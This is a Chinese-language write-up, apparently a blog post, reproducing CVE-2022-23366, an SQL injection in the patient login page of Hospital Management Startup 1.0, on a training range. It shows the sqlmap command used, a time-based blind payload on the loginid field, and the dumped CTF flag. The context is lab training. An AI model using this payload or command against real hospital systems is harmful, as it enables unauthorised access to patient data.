当前位置: 首页 > news >正文

Hospital Management Startup 1.0 SQL 注入漏洞(CVE-2022-23366)

前言

CVE-2022-23366是一个影响HMS v1.0的SQL注入漏洞。该漏洞存在于patientlogin.php文件中,允许攻击者通过特定的SQL注入来获取或修改数据库中的敏感信息。

具体来说,攻击者可以通过向patientlogin.php发送恶意构造的SQL语句来绕过身份验证,访问受保护的数据,甚至可能修改或删除数据库中的数据。此漏洞的CVSS v3评分为9.8,表明其严重性极高,因为无需认证就能被远程利用,且会导致高度的机密性、完整性和可用性影响​ (MITRE CVE)​​ (Tenable®)​。

该漏洞的详细信息和修复措施可以在Packet Storm Security和GitHub上找到。这些资源提供了更多技术细节和补救措施,建议用户尽快更新或修复受影响的系统。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。

教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。

竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。

资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Hospital Management Startup (HMS) v1.0 是一个用于医疗机构管理的软件系统,旨在简化和优化医院的日常运营和管理。以下是其主要功能和特点:

主要功能

  1. 患者管理

    • 提供详细的患者信息记录,包括基本信息、病历、治疗记录等。
    • 支持患者入院、出院和转院管理。
  2. 预约系统

    • 提供在线预约功能,患者可以方便地预约医生。
    • 医生可以查看和管理预约信息,安排日程。
  3. 医生管理

    • 记录和管理医生的详细信息,包括资格、专长和工作安排。
    • 支持医生的绩效评估和工作记录管理。
  4. 药品管理

    • 记录药品库存和使用情况,包括药品的采购、库存管理和分发。
    • 提供药品使用报告,帮助医院进行库存管理。
  5. 财务管理

    • 管理医院的财务收支,包括挂号费、治疗费和药品费等。
    • 提供财务报告和统计分析,帮助医院进行财务规划。
  6. 实验室管理

    • 管理实验室检验项目和结果,记录患者的检验报告。
    • 提供检验数据分析,辅助医生诊断和治疗。
  7. 病房管理

    • 管理病房信息,包括病房分配、使用情况和维护记录。
    • 实时监控病房状态,优化资源配置。

优势

  • 提高管理效率:通过信息化管理,减少人工操作,提高工作效率和准确性。
  • 优化患者体验:提供便捷的预约和就诊服务,提升患者满意度。
  • 数据安全:通过权限管理和数据加密,确保患者信息和医院数据的安全。
  • 支持决策分析:提供详细的统计分析和报告,辅助医院管理层进行决策。

应用场景

  • 综合医院:适用于大中型综合医院,提升医院的管理效率和服务质量。
  • 专科医院:适用于专科医院,根据需要定制功能,专注特定领域的管理。
  • 诊所和门诊部:适用于小型医疗机构,提高日常运营的效率。

总结

Hospital Management Startup (HMS) v1.0 是一款全面的医疗管理软件,致力于通过信息化手段优化医院的管理流程,提升工作效率和服务质量。它适用于各种类型和规模的医疗机构,是现代医院管理的理想选择。

漏洞复现

打开靶场

网上搜索了一下关于这个 CVE 的详细信息 

进入靶场后页面长这样

在导航栏 LOG IN 中发现下拉导航栏有与目标漏洞文件关联的选项 

随便输入数值,登录时使用 BurpSuite 开启拦截数据包

复制数据包的值到 txt 文件中 

使用 SQLMap 开跑

D:\CVE\sqlmap-master>python sqlmap.py -r sqlmap-post.txt -D “ctf” -T "flag" -C "flag" --dump_____H_____ ___[.]_____ ___ ___  {1.8.6.17#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 23:12:45 /2024-07-03/[23:12:45] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[23:12:45] [INFO] resuming back-end DBMS 'mysql'
[23:12:45] [INFO] testing connection to the target URL
[23:12:47] [WARNING] the web server responded with an HTTP error code (502) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: loginid (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: loginid=admin' AND (SELECT 6249 FROM (SELECT(SLEEP(5)))gTyH) AND 'YjsK'='YjsK&password=123456&submit=Login
---
[23:12:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:12:47] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[23:12:47] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'ctf'
[23:12:47] [INFO] resumed: 1
[23:12:47] [INFO] resumed: flag{a17af7eb-5fd8-4069-bb42-7335ed8c6b97
Database: ctf
Table: flag
[1 entry]
+-------------------------------------------+
| flag                                      |
+-------------------------------------------+
| flag{a17af7eb-5fd8-4069-bb42-7335ed8c6b97}|
+-------------------------------------------+[23:12:47] [INFO] table 'ctf.flag' dumped to CSV file 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeaey91a1p0r8n85s0e.cloudeci1.ichunqiu.com\dump\ctf\flag.csv'
[23:12:47] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times
[23:12:47] [INFO] fetched data logged to text files under 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeaey91a1p0r8n85s0e.cloudeci1.ichunqiu.com'[*] ending @ 23:12:47 /2024-07-03/

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Mongodb索引的删除
  • 源码编译安装 LAMP
  • 部署前端项目
  • 高效前端开发:解密pnpm的存储与链接
  • 第5章-组合序列类型
  • 二叉树的顺序存储
  • linux 进程堆栈分析
  • 精通C#编程需要学习哪些常用框架?
  • [安洵杯 2019]easy_serialize_php
  • 小型简易GIT服务器搭建和使用
  • 基于Memcached实现对象缓存:存储对象数据,如购物车内容,用户配置
  • 深入理解Spring Boot中的数据库优化
  • 音视频封装demo:将h264数据和aac数据封装(mux)成TS文件(纯手工,不依赖第三方开源库)
  • DDD架构
  • 快速将一个网址打包成一个exe可执行文件
  • Android交互
  • Android开发 - 掌握ConstraintLayout(四)创建基本约束
  • es的写入过程
  • Eureka 2.0 开源流产,真的对你影响很大吗?
  • go append函数以及写入
  • golang中接口赋值与方法集
  • Java 实战开发之spring、logback配置及chrome开发神器(六)
  • JavaScript的使用你知道几种?(上)
  • JavaScript服务器推送技术之 WebSocket
  • JS数组方法汇总
  • leetcode386. Lexicographical Numbers
  • Nginx 通过 Lua + Redis 实现动态封禁 IP
  • Xmanager 远程桌面 CentOS 7
  • 订阅Forge Viewer所有的事件
  • 猴子数据域名防封接口降低小说被封的风险
  • 删除表内多余的重复数据
  • 微信小程序开发问题汇总
  • 好程序员大数据教程Hadoop全分布安装(非HA)
  • 交换综合实验一
  • ​Base64转换成图片,android studio build乱码,找不到okio.ByteString接腾讯人脸识别
  • ​插件化DPI在商用WIFI中的价值
  • ​力扣解法汇总1802. 有界数组中指定下标处的最大值
  • #APPINVENTOR学习记录
  • #HarmonyOS:Web组件的使用
  • #传输# #传输数据判断#
  • $分析了六十多年间100万字的政府工作报告,我看到了这样的变迁
  • (Matalb时序预测)WOA-BP鲸鱼算法优化BP神经网络的多维时序回归预测
  • (Qt) 默认QtWidget应用包含什么?
  • (react踩过的坑)Antd Select(设置了labelInValue)在FormItem中initialValue的问题
  • (更新)A股上市公司华证ESG评级得分稳健性校验ESG得分年均值中位数(2009-2023年.12)
  • (九)信息融合方式简介
  • (原創) 博客園正式支援VHDL語法著色功能 (SOC) (VHDL)
  • (最优化理论与方法)第二章最优化所需基础知识-第三节:重要凸集举例
  • *ST京蓝入股力合节能 着力绿色智慧城市服务
  • .NET Core 中插件式开发实现
  • .Net OpenCVSharp生成灰度图和二值图
  • .net refrector
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地中转一个自定义的弱事件(可让任意 CLR 事件成为弱事件)
  • .NET:自动将请求参数绑定到ASPX、ASHX和MVC(菜鸟必看)
  • .net快速开发框架源码分享